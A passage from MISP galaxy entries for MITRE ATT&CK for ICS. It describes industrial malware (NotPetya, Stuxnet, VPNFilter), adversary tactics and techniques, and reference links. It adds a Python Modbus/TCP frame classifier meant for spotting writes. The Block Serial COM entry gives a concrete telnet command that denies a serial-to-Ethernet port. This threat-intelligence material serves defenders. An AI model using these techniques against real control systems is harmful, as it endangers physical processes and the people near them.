https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.us-cert.gov/ncas/alerts/TA17-163A

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

KillDisk

In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk’s main functionality is to overwrite files with random data, rendering the OS unbootable.

The tag is: misp-galaxy:mitre-ics-software="KillDisk"

Table 6904. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

LockerGoga

LockerGoga is ransomware that has been tied to various attacks on industrial and manufacturing firms with apparently catastrophic consequences.

The tag is: misp-galaxy:mitre-ics-software="LockerGoga"

Table 6905. Table References

Links

https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

NotPetya

NotPetya is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though NotPetya presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.

The tag is: misp-galaxy:mitre-ics-software="NotPetya"

Table 6906. Table References

Links

https://attack.mitre.org/software/S0368/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war

PLC-Blaster

PLC-Blaster is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules.

The tag is: misp-galaxy:mitre-ics-software="PLC-Blaster"

Table 6907. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Ryuk

Ryuk is ransomware that was first seen targeting large organizations for high-value ransoms in August of 2018. Ryuk temporarily disrupted operations at a manufacturing firm in 2018.

The tag is: misp-galaxy:mitre-ics-software="Ryuk"

Table 6908. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Stuxnet

Stuxnet was the first publicly reported piece of malware to specifically target industrial control system devices. Stuxnet is a large and complex piece of malware that used multiple tactics, including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.

The tag is: misp-galaxy:mitre-ics-software="Stuxnet"

Table 6909. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.symantec.com/security-center/writeup/2010-071400-3123-99

https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B

https://scadahacker.com/resources/stuxnet-mitigation.html

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

VPNFilter

VPNFilter is a multi-stage, modular platform with versatile capabilities to support both intelligence collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and the monitoring of Modbus SCADA traffic.

The tag is: misp-galaxy:mitre-ics-software="VPNFilter"

Table 6911. Table References

Links

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

https://www.youtube.com/watch?v=yuZazP22rpI
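
Modbus/TCP carries no authentication and no encryption, which is why a packet sniffer on a compromised router can read it outright. What such a sniffer yields, and what a defender should look for in the same traffic, is the function code: reads (codes 1 to 4) give the adversary Collection data about the process, while writes (5, 6, 15, 16) change coil and register state on the PLC. As an added example, not code from the VPNFilter analysis or from the ATT&CK for ICS galaxy, the Python below parses Modbus/TCP frames from a capture and separates the two, rejecting frames whose MBAP length field disagrees with the captured bytes. The capture is constructed for this example; the frame layout (7-byte MBAP header, then a PDU starting with the function code, exception responses flagged by setting bit 0x80) follows the Modbus Application Protocol specification.

```python
"""Classify Modbus/TCP frames the way a sniffer on a compromised router would.

Added example, not code from the VPNFilter analysis or the ATT&CK for ICS
galaxy. The capture below is constructed for this example.
"""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Public function codes from the Modbus Application Protocol specification.
READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}
MBAP_LEN = 7  # transaction id (2) + protocol id (2) + length (2) + unit id (1)

# Constructed capture: three client requests to unit 1 and one exception response.
SAMPLE_CAPTURE = [
    bytes.fromhex("00010000000601030000000A"),          # read 10 holding registers @0
    bytes.fromhex("0002000000060106001000FF"),          # write register 16 := 0x00FF
    bytes.fromhex("00030000000B0110001000020400010002"),  # write registers 16..17 := 1, 2
    bytes.fromhex("000100000003018302"),                # exception: illegal data address
]


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int          # exception bit (0x80) stripped
    is_exception: bool
    address: Optional[int] = None
    quantity: Optional[int] = None
    value: Optional[int] = None
    values: List[int] = field(default_factory=list)
    exception_code: Optional[int] = None

    @property
    def category(self) -> str:
        """'read' (collection), 'write' (process manipulation), 'exception' or 'other'."""
        if self.is_exception:
            return "exception"
        if self.function_code in READ_FUNCTIONS:
            return "read"
        return "write" if self.function_code in WRITE_FUNCTIONS else "other"


def parse_frame(data: bytes) -> ModbusFrame:
    """Parse one Modbus/TCP request or exception response; ValueError on bad framing."""
    if len(data) < MBAP_LEN + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", data[:MBAP_LEN])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    pdu = data[MBAP_LEN:MBAP_LEN + length - 1]   # 'length' counts unit id + PDU
    if len(pdu) != length - 1:
        raise ValueError("frame truncated: MBAP length exceeds captured bytes")
    fc = pdu[0]
    frame = ModbusFrame(tid, unit, fc & 0x7F, bool(fc & 0x80))
    body = pdu[1:]
    if frame.is_exception:
        frame.exception_code = body[0] if body else None
    elif fc in READ_FUNCTIONS or fc in (5, 6):
        if len(body) < 4:
            raise ValueError("request body too short")
        frame.address, second = struct.unpack(">HH", body[:4])
        if fc in (5, 6):
            frame.value = second      # single coil/register value
        else:
            frame.quantity = second   # number of items requested
    elif fc in (15, 16):
        if len(body) < 5:
            raise ValueError("request body too short")
        frame.address, frame.quantity, count = struct.unpack(">HHB", body[:5])
        payload = body[5:5 + count]
        expected = 2 * frame.quantity if fc == 16 else (frame.quantity + 7) // 8
        if len(payload) != count or count != expected:
            raise ValueError("byte count disagrees with quantity")
        frame.values = (list(struct.unpack(f">{frame.quantity}H", payload))
                        if fc == 16 else list(payload))   # coils stay bit-packed
    return frame


def summarize(capture: List[bytes]) -> dict:
    """Count frames per category and list the writes, the frames that change process state."""
    summary = {"read": 0, "write": 0, "exception": 0, "other": 0,
               "malformed": 0, "writes": []}
    for raw in capture:
        try:
            frame = parse_frame(raw)
        except ValueError:
            summary["malformed"] += 1
            continue
        summary[frame.category] += 1
        if frame.category == "write":
            summary["writes"].append(
                (frame.unit_id, WRITE_FUNCTIONS[frame.function_code], frame.address))
    return summary


if __name__ == "__main__":
    for key, val in summarize(SAMPLE_CAPTURE).items():
        print(f"{key}: {val}")
```

A write to a register the HMI never writes, or a write arriving from an address that is not the engineering workstation, is the kind of event the `writes` list is meant to surface; reads are noisy and mostly legitimate, but a burst of them from an unexpected host is the Collection activity described under the Tactics section.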

WannaCry

WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploit EternalBlue.

The tag is: misp-galaxy:mitre-ics-software="WannaCry"

Table 6912. Table References

Links

https://attack.mitre.org/software/S0366/

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Tactics

A list of all 11 tactics in ATT&CK for ICS.

Tactics is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Collection

The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal. Collection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of Discovery, to compile data on control systems and targets of interest that may be used to follow through on the adversary’s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plant operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other references may also be at risk and exposed on the internet or otherwise publicly accessible.

The tag is: misp-galaxy:mitre-ics-tactics="Collection"

Table 6913. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.research.lancs.ac.uk/portal/files/196578358/sample_sigconf.pdf

https://www.us-cert.gov/ncas/alerts/TA17-293A

Command and Control

The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment. Command and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion, for instance by using the ports and protocols common in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Command and Control"

Table 6914. Table References

Links

https://attack.mitre.org/wiki/Technique/T1090

Discovery

The adversary is trying to figure out your ICS environment. Discovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:mitre-ics-tactics="Discovery"

Table 6915. Table References

Links

https://attack.mitre.org/wiki/Technique/T1049

https://attack.mitre.org/wiki/Technique/T1040

https://attack.mitre.org/wiki/Technique/T1018

Evasion

The adversary is trying to avoid being detected. Evasion consists of techniques that adversaries use to avoid detection by both human operators and technical defenses throughout their compromise. Techniques used for evasion include removal of indicators of compromise, spoofing communications and reporting, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense and operator evasion for this purpose are often more passive in nature, as opposed to Inhibit Response Function techniques. They may also vary depending on whether the target of evasion is human or technological in nature, such as security controls. Techniques under other tactics are cross-listed to evasion when those techniques include the added benefit of subverting operators and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Evasion"

Table 6916. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://attack.mitre.org/wiki/Technique/T1014

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

Execution

The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network Discovery and Collection, impact operations, and inhibit response functions.

The tag is: misp-galaxy:mitre-ics-tactics="Execution"

Table 6917. Table References

Links

https://attack.mitre.org/wiki/Technique/T1059

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

http://www.dee.ufrj.br/controle_automatico/cursos/IEC61131-3_Programming_Industrial_Automation_Systems.pdf

https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=

http://www.plcdev.com/book/export/html/373

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.f-secure.com/weblog/archives/00002718.html

Impact

The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment. Impact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage Impair Process Control techniques, which often manifest in more self-revealing impacts on operations, or Inhibit Response Function techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach. Loss of Productivity and Revenue, Theft of Operational Information, and Damage to Property are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.

The tag is: misp-galaxy:mitre-ics-tactics="Impact"

Table 6918. Table References

Links

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

Impair Process Control

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause detrimental effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: misp-galaxy:mitre-ics-tactics="Impair Process Control"

Table 6919. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices

https://attack.mitre.org/techniques/T1489/

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

Inhibit Response Function

The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state. Inhibit Response Function consists of techniques that adversaries use to hinder the safeguards put in place for processes and products. This may involve the inhibition of safety, protection, quality assurance, or operator intervention functions to disrupt safeguards that aim to prevent the loss of life, destruction of equipment, and disruption of production. Techniques under this tactic include manipulation of hardware and software such as firmware, logic, alarms, and communication in order to deter a response. These techniques are often used together with Impair Process Control, so that the adversary’s manipulation of the process is neither detected nor countered, and they are more active in nature than Evasion techniques.

The tag is: misp-galaxy:mitre-ics-tactics="Inhibit Response Function"

Table 6920. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://attack.mitre.org/wiki/Technique/T1107

https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A

https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

http://cwe.mitre.org/data/definitions/400.html

https://nvd.nist.gov/vuln/detail/CVE-2015-5374

https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://attack.mitre.org/wiki/Technique/T1014

http://www.sciencedirect.com/science/article/pii/S1874548213000231

Initial Access

The adversary is trying to get into your ICS environment. Initial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.

The tag is: misp-galaxy:mitre-ics-tactics="Initial Access"

Table 6921. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.us-cert.gov/ncas/alerts/TA18-074A

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://attack.mitre.org/wiki/Technique/T1133

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/

https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.kkw-gundremmingen.de/presse.php?id=571

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant

https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant

https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/

https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/

https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298

https://www.bbc.com/news/technology-36158606

https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/

https://attack.mitre.org/techniques/T1193/

https://www.f-secure.com/weblog/archives/00002718.html

https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf

https://www.slideshare.net/dgpeters/17-bolshev-1-13

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Techniques

A list of Techniques in ATT&CK for ICS.

Techniques is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Activate Firmware Update Mode

Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.

The tag is: misp-galaxy:mitre-ics-techniques="Activate Firmware Update Mode"

Table 6922. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Alarm Suppression

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. In the Maroochy Attack, the adversary suppressed alarm reporting to the central computer. A Secura presentation on targeting OT notes a twofold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. The method of suppression may greatly depend on the type of alarm in question: an alarm raised by a protocol message, an alarm signaled with I/O, or an alarm bit set in a flag and read. In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal, to evade detection or to prevent intended responses from occurring. Methods of suppression may involve tampering with or altering device displays and logs, modifying in-memory code to fixed values, or even tampering with assembly-level instruction code.

The tag is: misp-galaxy:mitre-ics-techniques="Alarm Suppression"

Table 6923. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

Automated Collection

Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.

The tag is: misp-galaxy:mitre-ics-techniques="Automated Collection"

Table 6924. Table References

Links

https://www.f-secure.com/weblog/archives/00002718.html

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Block Command Message

Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. In the 2015 attack on the Ukrainian power grid, malicious firmware was used to render communication devices inoperable and effectively prevent them from receiving remote command messages.

The tag is: misp-galaxy:mitre-ics-techniques="Block Command Message"

Table 6925. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Reporting Message

Adversaries may block or prevent a reporting message from reaching its intended target. Reporting messages relay the status of control system devices, which can include event log data and I/O values of the associated device. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. In the 2015 attack on the Ukrainian power grid, malicious firmware was used to render communication devices inoperable and effectively block messages from being reported.

The tag is: misp-galaxy:mitre-ics-techniques="Block Reporting Message"

Table 6926. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Serial COM

Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available (1, 2 and 3), the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.

The tag is: misp-galaxy:mitre-ics-techniques="Block Serial COM"

Table 6927. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Brute Force I/O

Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.

The tag is: misp-galaxy:mitre-ics-techniques="Brute Force I/O"

Table 6928. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Change Program State

Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.

The tag is: misp-galaxy:mitre-ics-techniques="Change Program State"

Table 6929. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Command-Line Interface

Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.

The tag is: misp-galaxy:mitre-ics-techniques="Command-Line Interface"

Table 6930. Table References

Links

https://attack.mitre.org/wiki/Technique/T1059

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Commonly Used Port

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, avoiding more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, for example: TCP:80 (HTTP), TCP:443 (HTTPS), TCP/UDP:53 (DNS), TCP:1024-4999 (OPC on XP/Win2k3), TCP:49152-65535 (OPC on Vista and later), TCP:23 (TELNET), UDP:161 (SNMP), TCP:502 (MODBUS), TCP:102 (S7comm/ISO-TSAP), TCP:20000 (DNP3), and TCP:44818 (Ethernet/IP).

The tag is: misp-galaxy:mitre-ics-techniques="Commonly Used Port"

Table 6931. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Connection Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

The tag is: misp-galaxy:mitre-ics-techniques="Connection Proxy"

Table 6932. Table References

Links

https://attack.mitre.org/wiki/Technique/T1090

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

https://www.cpni.gov.uk/Documents/Publications/2014/2014-04-23-c2-report-birmingham.pdf

Damage to Property

